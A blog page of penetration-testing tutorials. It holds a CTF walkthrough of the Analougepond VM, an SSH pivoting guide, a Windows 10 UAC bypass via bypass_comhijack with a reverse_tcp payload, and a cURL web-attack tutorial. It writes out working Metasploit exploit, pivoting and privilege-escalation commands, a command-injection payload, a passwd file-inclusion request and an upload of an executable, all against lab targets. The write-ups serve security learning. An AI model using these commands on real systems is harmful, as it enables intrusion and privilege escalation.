Showing posts with label Kali Linux. Show all posts
Showing posts with label Kali Linux. Show all posts

Hack the Analougepond VM (CTF Challenge)

Hello friends! Today we are going to take another CTF channeling known as Analougepond which Based on our previous article “SSH pivoting”, if you are aware of ssh pivoting then you can easily breach this vm machine.

The credit for making this vm machine goes to “Knightmare” and it is another boot to root machine where author has hide flag for attacker as the new challenge.

Lets Breach!!!

The target holds 192.168.0.108 as network IP; now using nmap lets find out open ports.
nmap -sT -sU 192.168.0.108


From give image you can check port 22 for SSH, 68 for DHCP and 161 for SNMP are open in target network.


Now let’s enumerate for SNMP enumeration using metasploit
This module allows enumeration of any devices with SNMP protocol support. It supports hardware, software, and network information. The default community used is "public"

use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(snmp_enum) > set rhosts 192.168.0.108
msf auxiliary(snmp_enum) > set threads 5
msf auxiliary(snmp_enum) > exploit

From given image you can read system information, like host IP, hostname, description and etc. you will notice that here I had highlighted contact which contain a name Eric Burdon and location which contains some text “there is a hose in New Orleans they call it………
Here eric could be a hint for username, now let ask from Google for “there is a hose in New Orleans they call it………”


So when I search for given text in Google, I found that these texts are the lyric of a poem “The House of Rising Sun”. It might be possible that the author knightmare wants to give some password clue through this poem. From given image you can read the highlighted text “the Rising Sun” which could be the password for SSH.


Now let’s enumerate for SSH login using metasploit

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhost 192.168.0.108
msf auxiliary(ssh_login) > set username eric
msf auxiliary(ssh_login) > set password therisingsun
msf auxiliary(ssh_login) >exploit

As result we had successfully login and obtained command shell session 1of targeted system, more found install version of ubuntu i.e. 14.04.1
If you will search in Google you will come to know that ubuntu 14.04.1 is exploitable to overlayfs privilege escalation.


This module attempts to exploit two different CVEs related to overlayfs. CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55 3.16.0-25 (14.10 default) < 3.16.0-41 3.19.0-18 (15.04 default) < 3.19.0-21 CVE-2015-8660: Ubuntu: 3.19.0-18 < 3.19.0-43 4.2.0-18 < 4.2.0-23 (14.04.1, 15.10) Fedora: < 4.2.8 (vulnerable, un-tested) Red Hat: < 3.10.0-327 (rhel 6, vulnerable, un-tested)
use exploit/linux/local/overlayfs_priv_esc
msf exploit(overlayfs_priv_esc) > set  lhost 192.168.1.105
msf exploit(overlayfs_priv_esc) > set session 1
msf exploit(overlayfs_priv_esc) > exploit -j

This times also we had successfully got command shell session 2 opened of target system.


Now convert command shell (for session 2) into meterpreter shell using following command
Sessions -u 2
This will a new session which session 3 for meterpreter shell

Meterpreter> ls
Meterpreter> cat flag.txt
We have Captured 1st flag successfully!!


When as check network interface configuration in target system I found a new IP 192.168.122.1 on its 3rd interface as shown in given image.


This module manages session routing via an existing Meterpreter session. It enables other modules to ‘pivot’ through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

msf > use post/multi/manage/autoroute 
msf post(autoroute) > set subnet 192.168.122.1
msf post(autoroute) > set session 3
msf post(autoroute) > exploit


Meterpreter > arp
Here you can check all IP and MAC address, 192.168.122.2 will be another target.


Enumerate open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.

use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set rhost 192.168.122.2
msf auxiliary(tcp) > set 1-500
msf auxiliary(tcp) > set thread 10
msf auxiliary(tcp) > exploit

From result we found port 22 is open which used for SSH.


Move inside into meterperer shell then type following command for port forwarding of port 22 into port 8000 as shown below:
Sessions 3
Portfwd add -l 8000 -p 22 -r 192.168.122.2


Now login into SSH server through localhost with forwarded port
Ssh localhost -p 8000
From given image you can read the massage again it is a hint for username as “sandieshaw”; now let ask from Google for his famous song to get some hint for password.


After searching on google we guessed that the password should be sandieshaw’s famous song “puppetonastring”.
Now with this password we connect to sandieshaw through ssh.


After connecting to sandieshaw through ssh we found that we have to root this system.

After looking through the files on this system we found that Puppet is running on this system.
Among those files we find that a puppet file contains instructions to copy spin file in root access after ensuring it is present in the /tmp/ folder of the system.


Then we go into the files folder we found two files one in c language and another an executable file.  Opening the c file, we found it is the code for spinning pipe. Now we replace the c executable file with our file that gives the root access to the system.


The puppet file should execute this as root user and we will get the root shell to server.
We then come back to the meterpreter shell and upload it to the current user eric.


After upload it into the system we compile it and send it to the sandieshaw using ssh.
scp spin sandieshaw@192.168.122.2:/home/sandieshaw


Now we replace the spin file in the /etc/puppet/modules/wiggle/files/ with our spin file.


The spin is replaced, now we have to wait for the puppet file to replace the spin file in /tmp/ with our spin file.
After waiting some time we execute the spin file present in /tmp/ folder.


Now we have the root shell, moving into the /root/protovision folder we found a flag that is in hexadecimal format.
After converting it we found a base64 encoded inverse string.


After reversing the string and decoding it we found that it was a link to a youtube video.


Then we moved on to the other files jim and melvin didn’t had anything significant so we moved to the folder .I_have_you_now. There we found a folder .a, to check how many folders were there inside we searched for all the folders inside with command:
find . -type d


We found that it goes all the way to .z, we move to this location to see its content.


We found two files one in gpg encryption and another readable file then we decode this file using command:
gpg nleeson_key.gpg
This will ask a passphrase, the password is secret which is hinted in the video.
Opening the file we found that it was a private key. So we removed the permissions of the file using:
chmod 600 nleeson_key
Then we look at the content of the other file it displayed a single word joshua.

During our network scan we found another ip 192.168.122.3 that had ssh open but we couldn’t connect to it.
Now we try to connect to it using the private key we found.
After guessing a few users we found that nleeson was the user for the system.
using the key will ask for a passphrase and the password is joshua.


We connected to the system 192.168.122.3. After looking around we couldn’t find anything, so we went back into the root of 192.168.122.2. Here after looking through the files we found that 192.168.122.2 was the puppet server and 192.168.122.3 was the puppet client. We found a file called barringsbank-passwd that held all the username and password of 192.168.122.3.


So we added a new user ignite to this file by opening this file in vim.
Linux uses md5 salt hashes as password so we create an md5 hash using ignite and xyz as salt.


 Then we add our user to sudoers to gain root access.


Then we give our new user permissions same as root.


Then we connect to 192.168.122.3 through ssh and using the username and password we just created.


Now we have to wait some time for the puppet server to update the sudoers, so that our user can have root access.
Then we go to root shell using sudo su.
We move into the root folder and find an image file me.jpeg.


We then copy the image file to eric using ssh.
scp me.jpeg eric@192.168.1.119:/home/eric/


Then we download the file from eric to our local system through metasploit. We go to our meterpreter shell and download the me.jpeg to our system.
meterpreter > cd eric/
meterpreter > download me.jpeg /root/Desktop/


We used to exiftool on this file and found nothing so we performed steganography using steghide.
First we check if there is any file hidden behind this image using command:
steghide --info me.jpeg
The passphrase to this file is reticulatingsplines, I found it after various attempts.
Performing steganography we found a file hidden text file.


We extract the text file using steghide, we use the following command:
steghide extract -sf me.jpeg
It will again ask for an password i.e. reticulatingsplines.
After extracting the file we found that it is encrypted in hexadecimal format.


After converting the file from hexadecimal we found that the text was again encrypted in base64 format.



The text contains recurring gACI phrase that doesn’t allow it to be converted from base64 format.
After removing it we found that the text was inversed after reversing and decoding it we got the final flag.



SSH Pivoting using Meterpreter

If you are aware of SSH tunneling then you can easily understand SSH pivoting, if not then don’t worry read SSH tunneling from here.   

Pivoting is technique to get inside an unreachable network with help of pivot (centre point). In simple words it is an attack through which attacker can exploit those system which belongs to different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then attacker will able to target the client system for attack


This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.0.109
msf auxiliary(ssh_login) > set username raj
msf auxiliary(ssh_login) > set password 123
msf auxiliary(ssh_login) > exploit


From given image you we can observe that command shell session 1 opened


Now convert command shell into meterpreter shell through following command
Session –u 1
From given image you can observe that Meterpreter session 2 opened

Sessions

Hence if you will count then currently attacker has hold 2 sessions, 1st for command shell and 2nd for meterpreter shell of SSH server.


Check network interface using ifconfig command
From given image you can observe two network interface in victim’s system 1st for IP 192.168.0.109 through which attacker is connected and 2nd for IP 192.168.10.1 through which SSH client (targets) is connected.

Since attacker belongs to 192.168.0.1 interface and client belongs to 192.168.10.0 interface therefore it is not possible to directly make attack on client network until unless the attacker acquires same network connection. In order to achieve 192.168.10.0 network attacker need run the post exploitation “autoroute”.

This module manages session routing via an existing Meterpreter session. It enables other modules to 'pivot' through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

msf > use post/multi/manage/autoroute 
msf post(autoroute) > set subnet 192.168.10.0
msf post(autoroute) > set session 2
msf post(autoroute) > exploit


This time we are exploiting SSH ignite (local client) therefore we are going to use same module for it that had used above for SSH raj, only need to change information inside exploit.

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.10.2
msf auxiliary(ssh_login) > set username ignite
msf auxiliary(ssh_login) > set password 1234
msf auxiliary(ssh_login) > exploit

From given image you can see another command shell 3opened, if you will count then total attack has hold 3 sessions, two for SSH server and one for SSH client.

Sessions

1.       Command shell for SSH raj (192.168.0.109:22)
2.       Meterpreter shell for SSH raj (192.168.0.109)
3.       Command shell for SSH ignite (192.168.10.2:22)


Sessions 3
Now attacker is command shell of SSH ignite (client), let’s verify through network configuration.
Ifconfig
From given you can observe the network IP is 192.168.10.2

Pivoting is Dangerous but enjoyable network attack J

Bypass UAC in Windows 10 using bypass_comhijack Exploit

In this article we are going to bypass User Access Control (UAC) in targeted system. It is the post exploitation; hence attacker must exploit target system at first then escalate UAC Protection Bypass via COM Handler Hijack.

Let’s start!!

Attacker: Kali Linux
Target: window 10

Firstly exploit the target to receive meterpreter session of victim’s system. Once you get the meterpreter session 1 then type following command to check system authority and privileges.

getuid
getprivs

From given image you can perceive that attacker is inside the meterpreter shell of victim’s system but don’t have system/admin authorities and privileges. Hence here we need to bypass UAC Protection of targeted system.


To perform this attack you need to manually add bypass_comhijack exploit inside metasploit framework.


Copy the entire content of “bypass_comhijack” from here and past it in a text document, now save as bypass_comhijack.rb inside the following path:

usr>share>metasploit_framework>modules>exploit>windows>local

From given image you can observe bypass_comhijack.rb exploit has been saved, as attacker has his meterpreter session therefore now he can use this exploit in order to bypass UAC protection.


This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entire are referenced resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. Registry key modifications are cleaned up after payload invocation.

Use exploit/windows/local/bypassuac_comhijack
Msf exploit (bypassuac_comhijack) > set payload window/x64/meterpreter/reverse_tcp
Msf exploit (bypassuac_comhijack) > set session 2
Msf exploit (bypassuac_comhijack) > set lhost 192.168.0.20
Msf exploit (bypassuac_comhijack) > exploit

From given image you can observe that meterpreter session 3 opened, now type following command to determine system authority privileges.

getsystem
getprivs

Wonderful!! Attacker got system/admin authorities and privileges.

Web Application Penetration Testing with cURL

cURL is a computer software project providing a library and command-line tool for transferring data using various protocols.

CURL is simply awesome because of the following reasons...

·         CURL is an easy to use command line tool to send and receive files, and it supports almost all major protocols(DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS,  IMAP, IMAPS,  LDAP,  LDAPS,  POP3, POP3S, RTMP, RTSP, SCP, SFTP, SMTP, SMTPS, TELNET and TFTP) in use.
·         Can be used inside your shell scripts with ease
·         Supports features like pause and resume of downloads
·         It has around 120 command line options for various tasks
·         It runs on all major operating systems(More than 40+ Operating systems)
·         Supports cookies, forms and SSL
·         Both curl command line tool and libcurl library are open source, so they can be used in any of your programs
·         It supports configuration files
·         Multiple upload with a single command
·         Progress bar, rate limiting, and download time details
·         IPV6 Support

CURL comes by default installed in most of the distributions. If you do not have curl tool installed, then it’s a single apt-get (apt-get install curl) or yum (yum install curl) command.

For this tutorial we had used “web for pentester” to support curl command. As you known this lab is vulnerable against many website based attack therefore we had choose curl as our weapon for attack.


Let’s begin!!



Command Injection Exploitation
You must be aware command injection vulnerability which allows to execute OS based arbitrary command, type following command to check directory list in targeted system:

Curl “http://192.168.0.16/commandexec/example1.php?127.0.0.1;ls”


From given below image you can observe that it execute ping command as well as ls command, as result we found three PHP files in this directory.


Download File from URL
Curl is also use for download the data from any website or host machine, following command will download putty.exe file from website.
Curl -O https://the.earth.li/~sgtatham/putty/latest/putty.exe


HTTP Headers
Curl is use for identify HTTP method which helps in http verb tempering, type following command:
Curl -v -X http://www.google.com

From given below image you can perceive that only GET and HEAD methods are allowed on Google.


File Inclusion
This vulnerability allows an attacker to include a file on the web server, use following curl command to exploit it
Curl http://192.168.0.16/fileincl/example.php?page=etc/passwd


Hence you can observe that we found data from inside etc/passwd


HTTP Authentication
HTTP Authentication is use to inform the server user’s username and password so that it can authenticate that you're allowed to send the request you're sending. Curl is use HTTP Basic authentication. Now type following command which required username and password for login into website through curl.

Curl -data “uname=test&pass=test” http://testphp.vulnweb.com/userinfo.php


If you will notice given below image carefully you can observe that following code contains user information inside the table such as Email-ID, phone number, address and etc.


File Upload
Upload option inside in website allow uploading of any image or text on that particular website, for example uploading any image on facebook.  Use curl command to upload the putty.exe file on targeted system.
Curl -F ‘image=@/root/Desktop/putty.exe’ http://192.168.0.16/upload/example1.php


Great! You can read the highlighted text is indicating towards directory “/upload/images/putty.exe” where file has been successfully uploaded.


Open above given directory in browser as 192.168.0.16/upload/images/

Awesome! From given below you can see putty.exe is uploaded